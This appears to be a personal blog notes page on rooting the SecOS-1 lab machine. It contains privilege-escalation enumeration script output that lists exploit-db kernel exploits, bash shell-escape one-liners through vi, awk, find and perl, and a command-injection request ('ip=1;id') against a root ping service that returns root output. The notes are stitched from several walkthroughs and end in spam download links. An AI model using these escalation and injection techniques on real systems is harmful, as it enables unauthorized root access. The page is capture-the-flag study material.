linux-headers-3.13.0-24-generic 3.13.0-24.46 Linux kernel headers for version 3.13.0 on 32 bit x86 SMP
linux-headers-generic 3.13.0.24.28 Generic Linux kernel headers
linux-image-3.13.0-24-generic 3.13.0-24.46 Linux kernel image for version 3.13.0 on 32 bit x86 SMP
linux-image-extra-3.13.0-24-generic 3.13.0-24.46 Linux kernel extra modules for version 3.13.0 on 32 bit x86 SMP
linux-image-generic 3.13.0.24.28 Generic Linux kernel image
linux-libc-dev:i386 3.13.0-24.46 Linux Kernel Headers for development
locales 2.13+git20120306-12 common files for locale support
lockfile-progs 0.1.17 Programs for locking and unlocking files and mailboxes
login 1:4.1.5.1-1ubuntu9 system login tools
logrotate 3.8.7-1ubuntu1 Log rotation utility
lsb-base 4.1+Debian11ubuntu6 Linux Standard Base 4.1 init script functionality
lsb-release 4.1+Debian11ubuntu6 Linux Standard Base version reporting utility
lshw 02.16-2ubuntu1 information about hardware configuration
lsof 4.86+dfsg-1ubuntu2 Utility to list open files
ltrace 0.7.3-4ubuntu5 Tracks runtime library calls in dynamically linked programs
lvm2 2.02.98-6ubuntu2 Linux Logical Volume Manager
make 3.81-8.2ubuntu3 An utility for Directing compilation.
makedev 2.3.1-93ubuntu1 creates device files in /dev
man-db 2.6.7.1-1 on-line manual pager
manpages 3.54-1ubuntu1 Manual pages about using a GNU/Linux system
manpages-dev 3.54-1ubuntu1 Manual pages about using GNU/Linux for development
mawk 1.3.3-17ubuntu2 a pattern scanning and text processing language
memtest86+ 4.20-1.1ubuntu8 thorough real-mode memory tester
mime-support 3.54ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs
mlocate 0.26-1ubuntu1 quickly find files on the filesystem based on their name
module-init-tools 15-0ubuntu6 transitional dummy package (module-init-tools to kmod)
mongodb 1:2.4.9-1ubuntu2 object/document-oriented database (metapackage)
mongodb-clients 1:2.4.9-1ubuntu2 object/document-oriented database (client apps)
mongodb-dev 1:2.4.9-1ubuntu2 object/document-oriented database (development)
mongodb-server 1:2.4.9-1ubuntu2 object/document-oriented database (server package)
mount 2.20.1-5.1ubuntu20 Tools for mounting and manipulating filesystems
mountall 2.53 filesystem mounting tool
mtr-tiny 0.85-2 Full screen ncurses traceroute tool
multiarch-support 2.19-0ubuntu6 Transitional package to ensure multiarch compatibility
nano 2.2.6-1ubuntu1 small, friendly text editor inspired by Pico
ncurses-base 5.9+20140118-1ubuntu1 basic terminal type definitions
ncurses-bin 5.9+20140118-1ubuntu1 terminal-related programs and man pages
ncurses-term 5.9+20140118-1ubuntu1 additional terminal type definitions
net-tools 1.60-25ubuntu2 The NET-3 networking toolkit
netbase 5.2 Basic TCP/IP networking system
netcat-openbsd 1.105-7ubuntu1 TCP/IP swiss army knife
ntfs-3g 1:2013.1.13AR.1-2ubuntu2 read/write NTFS driver for FUSE
ntpdate 1:4.2.6.p5+dfsg-3ubuntu2 client for setting system time from NTP servers
openssh-client 1:6.6p1-2ubuntu1 secure shell (SSH) client, for secure access to remote machines
openssh-server 1:6.6p1-2ubuntu1 secure shell (SSH) server, for secure access from remote machines
openssh-sftp-server 1:6.6p1-2ubuntu1 secure shell (SSH) sftp server module, for SFTP access from remote machines
openssl 1.0.1f-1ubuntu2 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.63ubuntu1 utility to detect other OSes on a set of drives
parted 2.3-19ubuntu1 disk partition manipulator
passwd 1:4.1.5.1-1ubuntu9 change and administer password and group data
patch 2.7.1-4 Apply a diff file to an original
pciutils 1:3.2.1-1ubuntu5 Linux PCI Utilities
perl 5.18.2-2ubuntu1 Larry Wall's Practical Extraction and Report Language
perl-base 5.18.2-2ubuntu1 minimal Perl system
perl-modules 5.18.2-2ubuntu1 Core Perl modules
plymouth 0.8.8-0ubuntu17 graphical boot animation and logger - main package
plymouth-theme-ubuntu-text 0.8.8-0ubuntu17 graphical boot animation and logger - ubuntu-logo theme
policykit-1 0.105-4ubuntu2 framework for managing administrative policies and privileges
popularity-contest 1.57ubuntu1 Vote for your favourite packages automatically
powermgmt-base 1.31build1 Common utils and configs for power management
ppp 2.4.5-5.1ubuntu2 Point-to-Point Protocol (PPP) - daemon
pppconfig 2.3.19ubuntu1 A text menu based utility for configuring ppp
pppoeconf 1.20ubuntu1 configures PPPoE/ADSL connections
procps 1:3.3.9-1ubuntu2 /proc file system utilities
psmisc 22.20-1ubuntu2 utilities that use the proc file system
python 2.7.5-5ubuntu3 interactive high-level object-oriented language (default version)
python-apt 0.9.3.5 Python interface to libapt-pkg
python-apt-common 0.9.3.5 Python interface to libapt-pkg (locales)
python-chardet 2.0.1-2build2 universal character encoding detector
python-colorama 0.2.5-0.1ubuntu1 Cross-platform colored terminal text in Python - Python 2.x
python-configobj 4.7.2+ds-5build1 simple but powerful config file reader and writer for Python
python-debian 0.1.21+nmu2ubuntu2 Python modules to work with Debian-related data formats
python-distlib 0.1.8-1 low-level components of python distutils2/packaging
python-gdbm 2.7.5-1ubuntu1 GNU dbm database support for Python
python-html5lib 0.999-2 HTML parser/tokenizer based on the WHATWG HTML5 specification (Python 2)
python-minimal 2.7.5-5ubuntu3 minimal subset of the Python language (default version)
python-openssl 0.13-2ubuntu6 Python 2 wrapper around the OpenSSL library
python-pam 0.4.2-13.1ubuntu3 Python interface to the PAM library
python-pip 1.5.4-1 alternative Python package installer
python-pkg-resources 3.3-1ubuntu1 Package Discovery and Resource Access using pkg_resources
python-requests 2.2.1-1 elegant and simple HTTP library for Python, built for human beings
python-serial 2.6-1build1 pyserial - module encapsulating access for the serial port
python-setuptools 3.3-1ubuntu1 Python Distutils Enhancements (setuptools compatibility)
python-six 1.5.2-1 Python 2 and 3 compatibility library (Python 2 interface)
python-twisted-bin 13.2.0-1ubuntu1 Event-based framework for internet applications
python-twisted-core 13.2.0-1ubuntu1 Event-based framework for internet applications
python-urllib3 1.7.1-1build1 HTTP library with thread-safe connection pooling for Python
python-xapian 1.2.16-2ubuntu1 Xapian search engine interface for Python
python-zope.interface 4.0.5-1ubuntu4 Interfaces for Python
python2.7 2.7.6-8 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.6-8 Minimal subset of the Python language (version 2.7)
python3 3.4.0-0ubuntu2 interactive high-level object-oriented language (default python3 version)
python3-apport 2.14.1-0ubuntu3 Python 3 library for Apport crash report handling
python3-apt 0.9.3.5 Python 3 interface to libapt-pkg
python3-commandnotfound 0.3ubuntu12 Python 3 bindings for command-not-found.
python3-dbus 1.2.0-2build2 simple interprocess messaging system (Python 3 interface)
python3-distupgrade 1:0.220.2 manage release upgrades
python3-gdbm:i386 3.4.0-0ubuntu1 GNU dbm database support for Python 3.x
python3-gi 3.12.0-1 Python 3 bindings for gobject-introspection libraries
python3-minimal 3.4.0-0ubuntu2 minimal subset of the Python language (default python3 version)
python3-newt 0.52.15-2ubuntu5 NEWT module for Python3
python3-problem-report 2.14.1-0ubuntu3 Python 3 library to handle problem reports
python3-pycurl 7.19.3-0ubuntu3 Python 3 bindings to libcurl
python3-software-properties 0.92.36 manage the repositories that you install software from
python3-update-manager 1:0.196.11 python 3.x module for update-manager
python3.4 3.4.0-2ubuntu1 Interactive high-level object-oriented language (version 3.4)
python3.4-minimal 3.4.0-2ubuntu1 Minimal subset of the Python language (version 3.4)
readline-common 6.3-4ubuntu2 GNU readline and history libraries, common files
resolvconf 1.69ubuntu1 name server information handler
rsync 3.1.0-2 fast, versatile, remote (and local) file-copying tool
rsyslog 7.4.4-1ubuntu2 reliable system and kernel logging daemon
run-one 1.17-0ubuntu1 run just one instance of a command and its args at a time
screen 4.1.0~20120320gitdb59704-9 terminal multiplexer with VT100/ANSI terminal emulation
sed 4.2.2-4ubuntu1 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
sgml-base 1.26+nmu4ubuntu1 SGML infrastructure and SGML catalog file support
shared-mime-info 1.2-0ubuntu3 FreeDesktop.org shared MIME database and spec
software-properties-common 0.92.36 manage the repositories that you install software from (common)
ssh-import-id 3.21-0ubuntu1 securely retrieve an SSH public key and install it locally
strace 4.8-1ubuntu5 A system call tracer
sudo 1.8.9p5-1ubuntu1 Provide limited super user privileges to specific users
systemd-services 204-5ubuntu20 systemd runtime services
systemd-shim 6-2bzr1 shim for systemd
sysv-rc 2.88dsf-41ubuntu6 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-41ubuntu6 System-V-like utilities
tar 1.27.1-1 GNU version of the tar archiving utility
tasksel 2.88ubuntu15 Tool for selecting tasks for installation on Debian systems
tasksel-data 2.88ubuntu15 Official tasks used for installation of Debian systems
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
tcpdump 4.5.1-2ubuntu1 command-line network traffic analyzer
telnet 0.17-36build2 The telnet client
time 1.7-24 GNU time program for measuring CPU resource usage
tmux 1.8-5 terminal multiplexer
tzdata 2014b-1 time zone and daylight-saving time data
ubuntu-keyring 2012.05.19 GnuPG keys of the Ubuntu archive
ubuntu-minimal 1.325 Minimal core of Ubuntu
ubuntu-release-upgrader-core 1:0.220.2 manage release upgrades
ubuntu-standard 1.325 The Ubuntu standard system
ucf 3.0027+nmu1 Update Configuration File(s): preserve user changes to config files
udev 204-5ubuntu20 /dev/ and hotplug management daemon
ufw 0.34~rc-0ubuntu2 program for managing a Netfilter firewall
unattended-upgrades 0.82.1ubuntu2 automatic installation of security upgrades
update-manager-core 1:0.196.11 manage release upgrades
update-notifier-common 0.154.1 Files shared between update-notifier and other packages
upstart 1.12.1-0ubuntu4 event-based init daemon
ureadahead 0.100.0-16 Read required files in advance
usbutils 1:007-2ubuntu1 Linux USB utilities
util-linux 2.20.1-5.1ubuntu20 Miscellaneous system utilities
uuid-runtime 2.20.1-5.1ubuntu20 runtime components for the Universally Unique ID library
vim 2:7.4.052-1ubuntu3 Vi IMproved - enhanced vi editor
vim-common 2:7.4.052-1ubuntu3 Vi IMproved - Common files
vim-runtime 2:7.4.052-1ubuntu3 Vi IMproved - Runtime files
vim-tiny 2:7.4.052-1ubuntu3 Vi IMproved - enhanced vi editor - compact version
w3m 0.5.3-15 WWW browsable pager with excellent tables/frames support
watershed 7 reduce superfluous executions of idempotent command
wget 1.15-1ubuntu1 retrieves files from the web
whiptail 0.52.15-2ubuntu5 Displays user-friendly dialog boxes from shell scripts
wireless-regdb 2013.02.13-1ubuntu1 wireless regulatory database
wireless-tools 30~pre9-8ubuntu1 Tools for manipulating Linux Wireless Extensions
wpasupplicant 2.1-0ubuntu1 client support for WPA and WPA2 (IEEE 802.11i)
xauth 1:1.0.7-1ubuntu1 X authentication utility
xkb-data 2.10.1-1ubuntu1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xz-utils 5.1.1alpha+20120614-2ubuntu2 XZ-format compression utilities
zlib1g:i386 1:1.2.8.dfsg-1ubuntu1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 06:41 0:01 /sbin/init
root 2 06:41 0:00 [kthreadd]
root 3 06:41 0:00 [ksoftirqd/0]
root 5 06:41 0:00 [kworker/0:0H]
root 6 06:41 0:00 [kworker/u2:0]
root 7 06:41 0:00 [rcu_sched]
root 8 06:41 0:00 [rcu_bh]
root 9 06:41 0:00 [migration/0]
root 10 06:41 0:00 [watchdog/0]
root 11 06:41 0:00 [khelper]
root 12 06:41 0:00 [kdevtmpfs]
root 13 06:41 0:00 [netns]
root 14 06:41 0:00 [writeback]
root 15 06:41 0:00 [kintegrityd]
root 16 06:41 0:00 [bioset]
root 17 06:41 0:00 [kworker/u3:0]
root 18 06:41 0:00 [kblockd]
root 19 06:41 0:00 [ata_sff]
root 20 06:41 0:00 [khubd]
root 21 06:41 0:00 [md]
root 22 06:41 0:00 [devfreq_wq]
root 23 06:41 0:00 [kworker/0:1]
root 25 06:41 0:00 [khungtaskd]
root 26 06:41 0:00 [kswapd0]
root 27 06:41 0:00 [ksmd]
root 28 06:41 0:00 [fsnotify_mark]
root 29 06:41 0:00 [ecryptfs-kthrea]
root 30 06:41 0:00 [crypto]
root 42 06:41 0:00 [kthrotld]
root 44 06:41 0:00 [scsi_eh_0]
root 45 06:41 0:00 [scsi_eh_1]
root 67 06:41 0:00 [deferwq]
root 68 06:41 0:00 [charger_manager]
root 117 06:41 0:00 [kworker/u3:1]
root 119 06:41 0:00 [scsi_eh_2]
root 125 06:41 0:00 [kdmflush]
root 126 06:41 0:00 [bioset]
root 128 06:41 0:00 [kdmflush]
root 130 06:41 0:00 [bioset]
root 145 06:41 0:00 [jbd2/dm-0-8]
root 146 06:41 0:00 [ext4-rsv-conver]
root 198 06:41 0:00 [kauditd]
root 314 06:41 0:00 upstart-udev-bridge
root 318 06:41 0:00 /lib/systemd/systemd-udevd
root 363 06:41 0:00 [ext4-rsv-conver]
message+ 377 06:41 0:00 dbus-daemon
root 414 06:41 0:00 /lib/systemd/systemd-logind
syslog 441 06:41 0:00 rsyslogd
root 442 06:41 0:00 [kpsmoused]
root 446 06:41 0:00 [kworker/0:2]
root 463 06:41 0:00 upstart-file-bridge
root 482 06:41 0:00 dhclient
root 759 06:41 0:00 upstart-socket-bridge
root 769 06:41 0:00 sudo
spiderm+ 772 06:41 0:00 sh
spiderm+ 776 06:41 0:01 /usr/local/bin/node
root 832 06:41 0:00 sudo
root 865 06:41 0:00 sh
root 866 06:41 0:00 /usr/local/bin/node
root 869 06:41 0:00 /sbin/getty
root 872 06:41 0:00 /sbin/getty
root 877 06:41 0:00 /sbin/getty
root 879 06:41 0:00 /sbin/getty
root 881 06:41 0:00 /sbin/getty
root 909 06:41 0:00 /usr/sbin/sshd
mongodb 912 06:41 0:26 /usr/bin/mongod
root 914 06:41 0:00 acpid
root 921 06:41 0:00 cron
daemon 924 06:41 0:00 atd
root 997 06:41 0:00 /sbin/getty
root 1040 06:42 0:00 CRON
spiderm+ 1041 06:42 0:00 /bin/sh
spiderm+ 1042 06:42 0:00 /opt/phantomjs/bin/phantomjs
root 1046 06:43 0:00 CRON
spiderm+ 1047 06:43 0:00 /bin/sh
spiderm+ 1048 06:43 0:00 /opt/phantomjs/bin/phantomjs
root 1052 06:44 0:00 CRON
spiderm+ 1053 06:44 0:00 /bin/sh
spiderm+ 1054 06:44 0:00 /opt/phantomjs/bin/phantomjs
root 1058 06:45 0:00 CRON
spiderm+ 1059 06:45 0:00 /bin/sh
spiderm+ 1060 06:45 0:00 /opt/phantomjs/bin/phantomjs
root 1064 06:46 0:00 CRON
spiderm+ 1065 06:46 0:00 /bin/sh
spiderm+ 1066 06:46 0:00 /opt/phantomjs/bin/phantomjs
root 1070 06:47 0:00 CRON
spiderm+ 1071 06:47 0:00 /bin/sh
spiderm+ 1072 06:47 0:00 /opt/phantomjs/bin/phantomjs
root 1076 06:48 0:00 CRON
spiderm+ 1077 06:48 0:00 /bin/sh
spiderm+ 1078 06:48 0:00 /opt/phantomjs/bin/phantomjs
root 1082 06:48 0:00 [kworker/u2:1]
root 1083 06:49 0:00 CRON
spiderm+ 1084 06:49 0:00 /bin/sh
spiderm+ 1085 06:49 0:00 /opt/phantomjs/bin/phantomjs
root 1098 06:50 0:00 CRON
spiderm+ 1099 06:50 0:00 /bin/sh
spiderm+ 1100 06:50 0:00 /opt/phantomjs/bin/phantomjs
root 1104 06:51 0:00 CRON
spiderm+ 1105 06:51 0:00 /bin/sh
spiderm+ 1106 06:51 0:00 /opt/phantomjs/bin/phantomjs
root 1110 06:52 0:00 CRON
spiderm+ 1111 06:52 0:00 /bin/sh
spiderm+ 1112 06:52 0:00 /opt/phantomjs/bin/phantomjs
root 1116 06:53 0:00 CRON
spiderm+ 1117 06:53 0:00 /bin/sh
spiderm+ 1118 06:53 0:00 /opt/phantomjs/bin/phantomjs
root 1126 06:54 0:00 CRON
spiderm+ 1127 06:54 0:00 /bin/sh
spiderm+ 1128 06:54 0:00 /opt/phantomjs/bin/phantomjs
root 1132 06:54 0:00 sshd:
spiderm+ 1180 06:55 0:00 sshd:
spiderm+ 1181 06:55 0:00 -bash
root 1195 06:55 0:00 CRON
spiderm+ 1196 06:55 0:00 /bin/sh
spiderm+ 1197 06:55 0:00 /opt/phantomjs/bin/phantomjs
root 1202 06:56 0:00 CRON
spiderm+ 1203 06:56 0:00 /bin/sh
spiderm+ 1204 06:56 0:00 /opt/phantomjs/bin/phantomjs
root 1208 06:57 0:00 CRON
spiderm+ 1209 06:57 0:00 /bin/sh
spiderm+ 1210 06:57 0:00 /opt/phantomjs/bin/phantomjs
root 1214 06:58 0:00 CRON
spiderm+ 1215 06:58 0:00 /bin/sh
spiderm+ 1216 06:58 0:00 /opt/phantomjs/bin/phantomjs
root 1229 06:59 0:00 CRON
spiderm+ 1230 06:59 0:00 /bin/sh
spiderm+ 1231 06:59 0:00 /opt/phantomjs/bin/phantomjs
root 1235 07:00 0:00 CRON
spiderm+ 1236 07:00 0:00 /bin/sh
spiderm+ 1237 07:00 0:00 /opt/phantomjs/bin/phantomjs
root 1244 07:01 0:00 CRON
spiderm+ 1245 07:01 0:00 /bin/sh
spiderm+ 1246 07:01 0:00 /opt/phantomjs/bin/phantomjs
root 1251 07:02 0:00 CRON
spiderm+ 1252 07:02 0:00 /bin/sh
spiderm+ 1253 07:02 0:00 /opt/phantomjs/bin/phantomjs
root 1258 07:03 0:00 CRON
spiderm+ 1259 07:03 0:00 /bin/sh
spiderm+ 1260 07:03 0:00 /opt/phantomjs/bin/phantomjs
root 1316 07:04 0:00 CRON
spiderm+ 1317 07:04 0:00 /bin/sh
spiderm+ 1318 07:04 0:00 /opt/phantomjs/bin/phantomjs
spiderm+ 1677 07:04 0:00 python
spiderm+ 1678 07:04 0:00 tee
spiderm+ 1954 07:04 0:00 /bin/sh
spiderm+ 1955 07:04 0:00 ps
spiderm+ 1956 07:04 0:00 awk
[+] Apache Version and Modules
[+] Apache Config File
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.8.9p5
Sudoers policy plugin version 1.8.9p5
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.9p5
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 881 06:41 0:00 /sbin/getty
root 872 06:41 0:00 /sbin/getty
root 314 06:41 0:00 upstart-udev-bridge
root 1126 06:54 0:00 CRON
root 22 06:41 0:00 [devfreq_wq]
root 1251 07:02 0:00 CRON
root 119 06:41 0:00 [scsi_eh_2]
root 17 06:41 0:00 [kworker/u3:0]
root 10 06:41 0:00 [watchdog/0]
root 45 06:41 0:00 [scsi_eh_1]
root 769 06:41 0:00 sudo
Possible Related Packages:
sudo 1.8.9p5-1ubuntu1 Provide limited super user privileges to specific users
root 1104 06:51 0:00 CRON
root 869 06:41 0:00 /sbin/getty
root 914 06:41 0:00 acpid
Possible Related Packages:
acpid 1:2.0.21-1ubuntu2 Advanced Configuration and Power Interface event daemon
root 1058 06:45 0:00 CRON
root 1214 06:58 0:00 CRON
root 128 06:41 0:00 [kdmflush]
root 21 06:41 0:00 [md]
root 1110 06:52 0:00 CRON
root 126 06:41 0:00 [bioset]
root 42 06:41 0:00 [kthrotld]
root 877 06:41 0:00 /sbin/getty
root 1046 06:43 0:00 CRON
root 318 06:41 0:00 /lib/systemd/systemd-udevd
root 13 06:41 0:00 [netns]
root 20 06:41 0:00 [khubd]
root 482 06:41 0:00 dhclient
root 759 06:41 0:00 upstart-socket-bridge
root 1229 06:59 0:00 CRON
root 19 06:41 0:00 [ata_sff]
root 14 06:41 0:00 [writeback]
root 44 06:41 0:00 [scsi_eh_0]
root 1195 06:55 0:00 CRON
root 6 06:41 0:00 [kworker/u2:0]
root 909 06:41 0:00 /usr/sbin/sshd
root 7 06:41 0:00 [rcu_sched]
root 1064 06:46 0:00 CRON
root 8 06:41 0:00 [rcu_bh]
root 68 06:41 0:00 [charger_manager]
root 363 06:41 0:00 [ext4-rsv-conver]
root 26 06:41 0:00 [kswapd0]
root 1083 06:49 0:00 CRON
root 2 06:41 0:00 [kthreadd]
root 1098 06:50 0:00 CRON
root 832 06:41 0:00 sudo
Possible Related Packages:
sudo 1.8.9p5-1ubuntu1 Provide limited super user privileges to specific users
root 117 06:41 0:00 [kworker/u3:1]
root 442 06:41 0:00 [kpsmoused]
root 3 06:41 0:00 [ksoftirqd/0]
root 997 06:41 0:00 /sbin/getty
root 1070 06:47 0:00 CRON
root 1244 07:01 0:00 CRON
root 921 06:41 0:00 cron
Possible Related Packages:
cron 3.0pl1-124ubuntu2 process scheduling daemon
root 1040 06:42 0:00 CRON
root 125 06:41 0:00 [kdmflush]
root 11 06:41 0:00 [khelper]
root 1208 06:57 0:00 CRON
root 145 06:41 0:00 [jbd2/dm-0-8]
root 16 06:41 0:00 [bioset]
root 130 06:41 0:00 [bioset]
root 15 06:41 0:00 [kintegrityd]
root 29 06:41 0:00 [ecryptfs-kthrea]
root 1316 07:04 0:00 CRON
root 5 06:41 0:00 [kworker/0:0H]
root 28 06:41 0:00 [fsnotify_mark]
root 463 06:41 0:00 upstart-file-bridge
root 865 06:41 0:00 sh
root 1235 07:00 0:00 CRON
root 446 06:41 0:00 [kworker/0:2]
root 18 06:41 0:00 [kblockd]
root 9 06:41 0:00 [migration/0]
root 1258 07:03 0:00 CRON
root 198 06:41 0:00 [kauditd]
root 1076 06:48 0:00 CRON
root 12 06:41 0:00 [kdevtmpfs]
root 30 06:41 0:00 [crypto]
root 1052 06:44 0:00 CRON
root 879 06:41 0:00 /sbin/getty
root 23 06:41 0:00 [kworker/0:1]
root 67 06:41 0:00 [deferwq]
root 1202 06:56 0:00 CRON
root 25 06:41 0:00 [khungtaskd]
root 146 06:41 0:00 [ext4-rsv-conver]
root 1132 06:54 0:00 sshd:
root 1082 06:48 0:00 [kworker/u2:1]
root 414 06:41 0:00 /lib/systemd/systemd-logind
root 866 06:41 0:00 /usr/local/bin/node
root 1 06:41 0:01 /sbin/init
Possible Related Packages:
busybox-initramfs 1:1.21.0-1ubuntu1 Standalone shell setup for initramfs
init-system-helpers 1.14 helper tools for all init systems
initramfs-tools 0.103ubuntu4 tools for generating an initramfs
initramfs-tools-bin 0.103ubuntu4 binaries used by initramfs-tools
initscripts 2.88dsf-41ubuntu6 scripts for initializing and shutting down the system
insserv 1.14.0-5ubuntu2 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.3-0ubuntu1 minimal libc subset for use with initramfs
lsb-base 4.1+Debian11ubuntu6 Linux Standard Base 4.1 init script functionality
module-init-tools 15-0ubuntu6 transitional dummy package (module-init-tools to kmod)
ncurses-base 5.9+20140118-1ubuntu1 basic terminal type definitions
ncurses-term 5.9+20140118-1ubuntu1 additional terminal type definitions
sysvinit-utils 2.88dsf-41ubuntu6 System-V-like utilities
upstart 1.12.1-0ubuntu4 event-based init daemon
root 1116 06:53 0:00 CRON
root 27 06:41 0:00 [ksmd]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mount ed file system
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
root@kali:~/reports/192.168.117.6#
use https://www.exploit-db.com/exploits/37088/ to perform privilege escalation which got me to root
but others could be used as well
https://www.exploit-db.com/exploits/37292/
000000000000000000000000000000000000000000000000000
2nd approach for privilege escalation was to use ping utility but it looks like apache is not running as root so even if we were to compromise it, we wouldn't have anything new
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 760/node
tcp 0 0 127.0.0.1:28017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
spiderman@SecOS-1:/tmp$ curl 127.0.0.1:9000
shows a page in html with a ping utility. may be we can add
from walkthru C . use wget to post data from CLI. Add other cmds to ping cmd
000000000000000000000000000000000000000000000000000
from walkthru B
Hacking Node.js and MangoDB http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
from walkthru C$ wget --post-data="ip=1;id" localhost:9000
--2016-01-10 01:44:34-- http://localhost:9000/
Resolving localhost (localhost)... ::1, 127.0.0.1
Connecting to localhost (localhost)|::1|:9000... failed: Connection refused.
Connecting to localhost (localhost)|127.0.0.1|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2048 (2.0K) [text/html]
.......
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Ping result</h3>
</div>
<div class="panel-body">uid=0(root) gid=0(root) groups=0(root)
</div>
</div>
</div> <!-- /container -->
OR
.......
from walkthru D
To access this application, I set up a SSH tunnel. On my machine, I ran this command:
This allowed me to connect to the remote application on port 9000 from the browser of my Kali machine. Let me break it up:
- -f Requests ssh to go to background just before command execution. This is useful if ssh is going to ask for passwords or passphrases, but the user wants it in the background.
- -N Do not execute a remote command. This is useful for just forwarding ports.
- -L [bind_address:]port:host:hostport
Specifies that the given port on the local (client) host is to be forwarded to the given host and port on the remote side. This works by allocating a socket to listen to port on the local side, optionally bound to the specified bind_address. Whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to host porthostport from the remote machine.
- -l Specifies the user to log in as on the remote machine.
- 192.168.80.128 The IP address of the SecOS box
What this did was forwarding the connections to port 4444 on my local machine to the remote server on port 9000. Remember that the application is only listening on the localhost interface on the SecOS box. So, the SecOS machine is acting as a sort of gateway, tunneling the connections I point to my 4444 port to the 9000 port on localhost. You can read some more about how this works on http://en.wikibooks.org/wiki/OpenSSH/Cookbook/Tunnels
Now, in my browser, I went to http://127.0.0.1:4444/ and:
I tried pinging my Kali machine to see if it works but it just appeared to hang. So I tried limiting the amount of pings by entering
-c 2 after the IP to be pinged. And it worked!
We know the ping app is running as root, so if we can do remote code execution, we’ll be able to run commands as root. And the application is vulnerable to just what we need! Remember these lines from the internal server code:
000000000000000000000000000000000000000000000000000
28 Vm Secos-1 >>>>> Download Now
ReplyDelete>>>>> Download Full
28 Vm Secos-1 >>>>> Download LINK
>>>>> Download Now
28 Vm Secos-1 >>>>> Download Full
>>>>> Download LINK Lx